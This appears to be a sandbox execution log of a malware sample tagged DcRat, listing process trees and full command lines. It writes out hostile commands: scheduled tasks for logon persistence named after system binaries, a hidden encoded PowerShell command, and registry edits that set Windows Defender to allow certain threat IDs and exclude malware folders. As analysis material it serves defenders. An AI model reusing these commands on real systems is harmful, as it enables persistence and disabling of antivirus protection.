C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1368 -ip 1368
1⤵
PID:4644

C:\Windows\SysWOW64\uefifces\ezokegez.exe
C:\Windows\SysWOW64\uefifces\ezokegez.exe /d"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"
1⤵
PID:1420

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 516
2⤵
- Program crash
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4252 -ip 4252
1⤵
PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1420 -ip 1420
1⤵
PID:4236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\docprop\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Documents and Settings\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\unimdmat\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\WMADMOE\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ETuSLYkVQqOjTT_usPKsVG0_" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Mh9GBYaC5IGIHnRPtOgGO9qd\ETuSLYkVQqOjTT_usPKsVG0_.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "arnatic_7" /sc ONLOGON /tr "'C:\Documents and Settings\arnatic_7.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Uev.Office2013CustomActions\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\odt\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1368 -ip 1368
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5044 -ip 5044
1⤵
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5004 -ip 5004
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4148 -ip 4148
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1368 -ip 1368
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4900 -ip 4900
1⤵
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 4148
1⤵
PID:5188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 4148
1⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 4148
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5044 -ip 5044
1⤵
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5824 -ip 5824
1⤵
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4900 -ip 4900
1⤵
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1368 -ip 1368
1⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5004 -ip 5004
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4148 -ip 4148
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1332 -ip 1332
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1368 -ip 1368
1⤵
PID:3504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4148 -ip 4148
1⤵
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4148 -ip 4148
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1332 -ip 1332
1⤵
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4148 -ip 4148
1⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5884 -ip 5884
1⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2656

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\AF15.exe
C:\Users\Admin\AppData\Local\Temp\AF15.exe
1⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\AFC2.exe
C:\Users\Admin\AppData\Local\Temp\AFC2.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1968

C:\Users\Admin\AppData\Local\Temp\AFC2.exe
C:\Users\Admin\AppData\Local\Temp\AFC2.exe
2⤵
PID:5232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3540

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe j6 /site_id 525403 /S
1⤵
PID:4592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:804

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:6056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:6064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5932

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:5852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5280

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
3⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
3⤵
PID:4780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
3⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
3⤵
PID:1236

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "grVdSBQdv" /SC once /ST 08:24:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- DcRat
- Executes dropped EXE
- Creates scheduled task(s)
PID:1448

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "grVdSBQdv"
2⤵
PID:5836

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "grVdSBQdv"
2⤵
PID:2308

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 15:10:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe\" sG /site_id 525403 /S" /V1 /F
2⤵
- DcRat
- Creates scheduled task(s)
PID:5224

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
2⤵
PID:3356

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
PID:5580

C:\Users\Admin\AppData\Roaming\dahbvur
C:\Users\Admin\AppData\Roaming\dahbvur
1⤵
PID:3164

C:\Users\Admin\AppData\Roaming\vvhbvur
C:\Users\Admin\AppData\Roaming\vvhbvur
1⤵
PID:5408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5728

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5572

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5704

C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe
